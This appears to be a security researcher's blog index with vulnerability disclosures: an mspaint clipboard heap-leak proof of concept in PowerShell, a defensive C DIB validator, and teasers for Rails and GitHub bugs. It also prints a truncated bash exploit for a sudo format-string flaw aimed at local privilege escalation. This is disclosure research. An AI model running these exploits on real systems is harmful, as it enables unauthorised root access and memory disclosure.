Paintbleed

Summary

mspaint.exe does not properly verify DIB data taken from the clipboard. Therefore we can craft some DIB data in the clipboard which e.g. claims a size of 0x100 by 0x100 pixels but contains nothing more than the DIB header itself. So the actual image data rendered by mspaint.exe is its own heap data =)

PoC

Run the following code in PowerShell:

    # load the WinForms assembly that provides the Clipboard class
    Add-Type -AssemblyName System.Windows.Forms
    # 40-byte BITMAPINFOHEADER: 256x256 pixels, 1 plane, 24 bpp, BI_RGB, no pixel data follows
    [byte[]]$bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    [System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib, [System.IO.MemoryStream]::new($bytes))

Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaints.
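The check that a clipboard consumer has to perform before rendering, as an added example in C. This is not code from the original post and not mspaint's code; the function and constant names are mine, and it handles only uncompressed (BI_RGB) DIBs. It reads the BITMAPINFOHEADER fields from the blob, recomputes how many pixel bytes a bitmap of that width, height and bit depth must carry, and refuses the blob when fewer bytes follow the header. The 40-byte sample is exactly the header from the PoC above; the 1x1 sample is constructed for contrast.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Little-endian field readers; CF_DIB data is a raw BITMAPINFOHEADER
   followed by an optional colour table and the pixel rows. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Bytes of pixel data an uncompressed (BI_RGB) DIB must carry: every row
   is padded to a multiple of 4 bytes; a negative height only flips the
   row order. Returns 0 for dimensions that make no sense. */
uint64_t dib_pixel_bytes(int32_t width, int32_t height, uint16_t bpp)
{
    if (width <= 0 || height == 0 || bpp == 0 || bpp > 32)
        return 0;
    uint64_t rows = height < 0 ? (uint64_t)(-(int64_t)height) : (uint64_t)height;
    uint64_t row_bytes = (((uint64_t)width * bpp) + 31) / 32 * 4;
    return row_bytes * rows;
}

/* Reason codes returned by dib_validate(). */
enum {
    DIB_OK = 0,
    DIB_HEADER_TRUNCATED,   /* fewer than 40 bytes: no full BITMAPINFOHEADER */
    DIB_BAD_BISIZE,         /* biSize smaller than 40 or larger than the blob */
    DIB_UNSUPPORTED,        /* compressed formats are out of scope here */
    DIB_BAD_DIMENSIONS,     /* zero/negative width, zero height, bogus bpp */
    DIB_PIXELS_MISSING      /* header promises more pixel bytes than follow it */
};

/* Validate a CF_DIB blob of len bytes. On return *needed (if non-NULL)
   holds the pixel-byte count the header implies, so a caller can log how
   far out of bounds a render would have read. */
int dib_validate(const uint8_t *buf, size_t len, uint64_t *needed)
{
    if (needed) *needed = 0;
    if (len < 40) return DIB_HEADER_TRUNCATED;

    uint32_t bi_size     = rd32(buf + 0);   /* biSize        */
    int32_t  width       = (int32_t)rd32(buf + 4);   /* biWidth  */
    int32_t  height      = (int32_t)rd32(buf + 8);   /* biHeight */
    uint16_t bpp         = rd16(buf + 14);  /* biBitCount    */
    uint32_t compression = rd32(buf + 16);  /* biCompression */
    uint32_t clr_used    = rd32(buf + 32);  /* biClrUsed     */

    if (bi_size < 40 || bi_size > len) return DIB_BAD_BISIZE;
    if (compression != 0 /* BI_RGB */)  return DIB_UNSUPPORTED;

    uint64_t pixels = dib_pixel_bytes(width, height, bpp);
    if (needed) *needed = pixels;
    if (pixels == 0) return DIB_BAD_DIMENSIONS;

    /* Indexed formats carry a palette of 4-byte entries before the pixels. */
    uint64_t palette = 0;
    if (bpp <= 8)
        palette = 4ull * (clr_used ? clr_used : (1u << bpp));

    /* The whole point: compare what the header promises with what is there. */
    if ((uint64_t)len - bi_size < palette + pixels)
        return DIB_PIXELS_MISSING;
    return DIB_OK;
}

/* The 40 bytes from the PowerShell PoC above: 256x256, 24 bpp, BI_RGB,
   biSizeImage = 392, and nothing at all after the header. */
const uint8_t paintbleed_poc[40] = {
    40,0,0,0,  0,1,0,0,  0,1,0,0,  1,0,  24,0,  0,0,0,0,  136,1,0,0,
    0,0,0,0,  0,0,0,0,  0,0,0,0,  0,0,0,0
};

/* Constructed well-formed DIB for contrast: 1x1, 24 bpp, one 4-byte padded row. */
const uint8_t tiny_valid_dib[44] = {
    40,0,0,0,  1,0,0,0,  1,0,0,0,  1,0,  24,0,  0,0,0,0,  4,0,0,0,
    0,0,0,0,  0,0,0,0,  0,0,0,0,  0,0,0,0,
    0xff,0xff,0xff,0x00
};

int main(void)
{
    uint64_t needed;
    int rc = dib_validate(paintbleed_poc, sizeof paintbleed_poc, &needed);
    printf("PoC header: rc=%d, promises %llu pixel bytes, carries %zu\n",
           rc, (unsigned long long)needed, sizeof paintbleed_poc - 40);
    rc = dib_validate(tiny_valid_dib, sizeof tiny_valid_dib, &needed);
    printf("1x1 sample: rc=%d, promises %llu pixel bytes, carries %zu\n",
           rc, (unsigned long long)needed, sizeof tiny_valid_dib - 40);
    return 0;
}
```

Note that the size is recomputed from width, height and bit depth rather than taken from biSizeImage: the PoC header sets biSizeImage to 392 (bytes 136,1,0,0) while a 256x256 24 bpp bitmap needs 196608 bytes of pixel data, so a consumer that trusted either the header's own size field or the dimensions alone would still read far past the 40 bytes it was handed.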
Read more →

WebConsole IP Whitelist bypass

With the release of Ruby on Rails 4.2 the so-called Web Console was introduced. As the Web Console documentation states: "Web Console is built explicitly for Rails 4." By default the Web Console is available in the Rails development environment and allows only the IPs 127.0.0.1 and ::1 to access the console in order to evaluate arbitrary Ruby statements for the purpose of debugging. However, with Rails versions 4.1 and 4.
Read more →

CVE-2012-0809 Exploit

Original gist

    #!/bin/bash
    # CVE-2012-0809 exploit
    # joernchen of Phenoelit's version
    # Payload to be executed goes to /tmp/a (might be a shell script)
    cd /tmp
    /bin/echo '-> Clearing ENV'
    # unset every variable (PATH included, hence the absolute paths below)
    for i in $(env | cut -f1 -d "="); do unset $i; done
    /bin/echo '-> Creating symlink'
    # the symlink's name is the format string; quoted so the shell keeps "$n" literal
    /bin/ln -s /usr/bin/sudo './%134520134x%900$n'
    /bin/echo '-> Setting ENV'
    export AAA=AAAA;
    export A;
    # fill the environment with 5000 copies of the address 0x08058324 (little-endian)
    for i in $(/usr/bin/seq 1 5000); do export A=$A$(echo -n -e '\x24\x83\x05\x08'); done;
    /bin/echo '-> Now a little Brute-Force'
    while true ; do SUDO_ASKPASS=/tmp/a .
Read more →

GitHub RCE Writeup

Original gist

GitHub RCE by Environment variable injection - Bug Bounty writeup

Disclaimer: I'll keep this really short, but I hope you'll get the key points.

GitHub blogged a while ago about some internal tool called gerve: https://github.com/blog/530-how-we-made-github-fast

Upon git+ssh-ing to github.com, gerve basically looks up your permission on the repo you want to interact with. Then it bounces you further into another forced SSH session to the back end where the repo actually is.
Read more →

XXE to RCE

Read more →